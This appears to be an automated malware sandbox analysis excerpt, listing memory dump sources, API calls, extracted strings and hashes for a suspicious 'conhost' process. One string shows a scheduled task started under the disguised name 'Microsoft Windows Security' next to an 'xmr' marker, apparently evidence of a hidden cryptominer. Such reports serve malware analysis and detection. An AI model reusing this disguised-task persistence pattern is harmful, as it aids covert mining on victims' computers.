                                                                                                                                                                                                • Part of subcall function 00007FF7B89AD5B0: VirtualQuery.KERNEL32 ref: 00007FF7B89AD65B
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Unknown pseudo relocation protocol version %d., xrefs: 00007FF7B89ADB12
                                                                                                                                                                                              • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7B89ADB03
                                                                                                                                                                                              • Unknown pseudo relocation bit size %d., xrefs: 00007FF7B89ADAEA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Virtual$ProtectQuery
                                                                                                                                                                                              • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                                                              • API String ID: 1027372294-1286557213
                                                                                                                                                                                              • Opcode ID: b82df57671828b0e606e8ee7d4ffc2afcd820c2398f462e0173a7178461af3de
                                                                                                                                                                                              • Instruction ID: 5936cead6e30f92ad70c1ba3b8917bae2363fd1404b6ea7644226b7871d8fdaa
                                                                                                                                                                                              • Opcode Fuzzy Hash: b82df57671828b0e606e8ee7d4ffc2afcd820c2398f462e0173a7178461af3de
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F91A021F0954385EF20AB2D9400669E361BF67B95F944235DE9D0B7CCDE3DE442CB28
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: freememcpystrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2208669145-0
                                                                                                                                                                                              • Opcode ID: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
                                                                                                                                                                                              • Instruction ID: 7ad2e7c0eb7cf190c190b5cf2c643ba28720933548f77e617a6ae91efb7a7643
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7411ab55849008a007dc6c83d4a2f9a73750c58f95e0d40c170e633452adc814
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D31A722B1964345FD667A196A00279D1506FA2FE6F944131EFDD0FBDCDE3CE5438228
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Byte$CharLeadMultiWide
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2561704868-0
                                                                                                                                                                                              • Opcode ID: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
                                                                                                                                                                                              • Instruction ID: 0ad9d60b04a38b9a0081147b6d0190eb9e655e30ff33c1f6c505e0cb8e2a5c5a
                                                                                                                                                                                              • Opcode Fuzzy Hash: fa114358f9d1c0645f095336089c12bb421f7b72dfbfd9187bbe8f1e91e12f03
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5231A672A0C28286EB615B29E4003ADF690BBA2755F948135EBC8877D9CF3DE446CB14
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wcscpywcslen
                                                                                                                                                                                              • String ID: %S /run /tn "Microsoft Windows Security"$xmr
                                                                                                                                                                                              • API String ID: 225642448-2694755926
                                                                                                                                                                                              • Opcode ID: 44473131342b9c3d6659860616ea861b569dae8c1284f4b33d658fc321378122
                                                                                                                                                                                              • Instruction ID: 941443f36eaee27b6b0ce7e07a2a3084920f97651032a9b9c00e5925d989af5b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 44473131342b9c3d6659860616ea861b569dae8c1284f4b33d658fc321378122
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4131082260824345EE20AF59A4003BAF691FB563A5FC44635EF9D0B7D9EE7DE0868714
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: strlen
                                                                                                                                                                                              • String ID: this${parm#$}
                                                                                                                                                                                              • API String ID: 39653677-3278767634
                                                                                                                                                                                              • Opcode ID: d126d87f218acd473fc4b93330089d8a4941b7047482bd3d1eb6a4281afbbf06
                                                                                                                                                                                              • Instruction ID: 1cc7b4a54f78dc39251cccd63f28ce94c94508fe8856d9e7cfd332ede946355e
                                                                                                                                                                                              • Opcode Fuzzy Hash: d126d87f218acd473fc4b93330089d8a4941b7047482bd3d1eb6a4281afbbf06
                                                                                                                                                                                              • Instruction Fuzzy Hash: 77216772A4C68382EB65AF2894003F9A691EB66B59F884131CF890E74DDF7C94478375
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wcslen
                                                                                                                                                                                              • String ID: 0$@
                                                                                                                                                                                              • API String ID: 4088430540-1545510068
                                                                                                                                                                                              • Opcode ID: 26fbaa74645c58beb1c662cd1072959fce96db4e188e223cb72cb4d6abf3e704
                                                                                                                                                                                              • Instruction ID: 19536aaf561329cddd4f6cc5260eb7541b6a9e5547ee5745a7b60409c009ad19
                                                                                                                                                                                              • Opcode Fuzzy Hash: 26fbaa74645c58beb1c662cd1072959fce96db4e188e223cb72cb4d6abf3e704
                                                                                                                                                                                              • Instruction Fuzzy Hash: F921AB3261878186E7209B69F44579BF6A0FBD5388F600135FBC887B59EB7CD049CB04
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: wcslen
                                                                                                                                                                                              • String ID: 0$@
                                                                                                                                                                                              • API String ID: 4088430540-1545510068
                                                                                                                                                                                              • Opcode ID: aea334ff16771d315f46423bd26d5fdcc2d3ba9439c4921da91f434a81118734
                                                                                                                                                                                              • Instruction ID: 70ef7a7e54f620eae9a724a11abc9dd16a71d125c21e936efcea1668664e8528
                                                                                                                                                                                              • Opcode Fuzzy Hash: aea334ff16771d315f46423bd26d5fdcc2d3ba9439c4921da91f434a81118734
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1311B22261878282EB50AB69F48535AE760FFD5358F900135FBCD87B59EF7CD4468B04
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fprintf
                                                                                                                                                                                              • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                              • API String ID: 383729395-3474627141
                                                                                                                                                                                              • Opcode ID: c6129450d7204aa9425f0b0a5ee21873e3dcf374583c3fc542229302485bd395
                                                                                                                                                                                              • Instruction ID: 3e0e834dba02d599fe1b5e6155f4aa8a942c3cc68cb24ac1e0613f84f5420e82
                                                                                                                                                                                              • Opcode Fuzzy Hash: c6129450d7204aa9425f0b0a5ee21873e3dcf374583c3fc542229302485bd395
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2201C222908E89C2DA129F1CD8011EAF374FFAA75AF545325FB8D26264DF29E543C704
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fprintf
                                                                                                                                                                                              • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                              • API String ID: 383729395-4064033741
                                                                                                                                                                                              • Opcode ID: ffc7f7083ab47e760bb295ee22dbabe757db34ba60a4b9d6e098a080ac5640f8
                                                                                                                                                                                              • Instruction ID: fd57d139e8ec181818dacc408615fed5a327ab9de6d7f540c8595ffb980eb335
                                                                                                                                                                                              • Opcode Fuzzy Hash: ffc7f7083ab47e760bb295ee22dbabe757db34ba60a4b9d6e098a080ac5640f8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 54F0C812808E4581D6029F1C94000EAF374FF5E74AF545325FB8E36164DF28E5438314
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fprintf
                                                                                                                                                                                              • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                              • API String ID: 383729395-4283191376
                                                                                                                                                                                              • Opcode ID: c490c49c59b9e24825c0a6802d573e2208797f7dd482eb3f8c93c705cb10b757
                                                                                                                                                                                              • Instruction ID: bfaf5ea5aa6e0357b2bf96afd2f2b90b37cef2c5f95f8ec758b5be30b974757e
                                                                                                                                                                                              • Opcode Fuzzy Hash: c490c49c59b9e24825c0a6802d573e2208797f7dd482eb3f8c93c705cb10b757
                                                                                                                                                                                              • Instruction Fuzzy Hash: 50F0C812808E4581D602DF1C94000FAF374FF5E74AF545325FB8E36164DF28E5438314
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fprintf
                                                                                                                                                                                              • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                              • API String ID: 383729395-2468659920
                                                                                                                                                                                              • Opcode ID: 6e42f6ab832643018c5ab5e1db53d9ba1314b211f5c00237c330fd30a230164e
                                                                                                                                                                                              • Instruction ID: 8f35c11280d5ddd446137e379444207696c1bfca06e5687bd91e9f61346efeb9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e42f6ab832643018c5ab5e1db53d9ba1314b211f5c00237c330fd30a230164e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 62F0C852808E4581D612DF1C94000EBF374FF9EB4AF545325EB8D26564DF28E5438354
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fprintf
                                                                                                                                                                                              • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                              • API String ID: 383729395-2187435201
                                                                                                                                                                                              • Opcode ID: 29f4ef5d8c173d3b74eb3c22cac1c5b2ad5d3302bc35ae5ea985eda276a5f484
                                                                                                                                                                                              • Instruction ID: 3eaf4c4ddc8a4fda0478c324c70e367bf2138d53bebc13142206547ca138f254
                                                                                                                                                                                              • Opcode Fuzzy Hash: 29f4ef5d8c173d3b74eb3c22cac1c5b2ad5d3302bc35ae5ea985eda276a5f484
                                                                                                                                                                                              • Instruction Fuzzy Hash: 44F0C812808E4581D602DF1C94000EAF374FF5E74AF585325FB8E36264DF28E5438314
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fprintf
                                                                                                                                                                                              • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                              • API String ID: 383729395-4273532761
                                                                                                                                                                                              • Opcode ID: 0bcdd2314c3c51517d5ee07b94d97467dc0410b7a3df75df8a4817ab909ac92e
                                                                                                                                                                                              • Instruction ID: 1a688c284f475b0a0ee8b53ec7a421846090ad1eaa108a56e41d6c543850cb13
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bcdd2314c3c51517d5ee07b94d97467dc0410b7a3df75df8a4817ab909ac92e
                                                                                                                                                                                              • Instruction Fuzzy Hash: A3F0C812808E4581D6029F1C94000EAF374FF5E74AF545325EB8D26564DF28E5438314
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fprintf
                                                                                                                                                                                              • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                              • API String ID: 383729395-2713391170
                                                                                                                                                                                              • Opcode ID: abe0cd034ca6e7e039f3be2709ea70163147327bdca782690fe654ac2d43d253
                                                                                                                                                                                              • Instruction ID: 0d3f9aedd0d4b43b4227f6bd4ecedfc46d3018ed67f6b038a10026a561ab018b
                                                                                                                                                                                              • Opcode Fuzzy Hash: abe0cd034ca6e7e039f3be2709ea70163147327bdca782690fe654ac2d43d253
                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F06212915F4981D6029F1DA4001AAF364FF5E79AF545325EF8A36624DF28D5438714
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000025.00000002.3517889006.00007FF7B89A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF7B89A0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000025.00000002.3516855571.00007FF7B89A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3517957854.00007FF7B89BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3518026985.00007FF7B89BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3519877184.00007FF7B89C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000025.00000002.3520042046.00007FF7B89C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_37_2_7ff7b89a0000_conhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4020351045-0
                                                                                                                                                                                              • Opcode ID: 2dfa7707a2d4e303a1a78d16bdb6f7eaf57818cde39d8471c90da31edd0f8fca
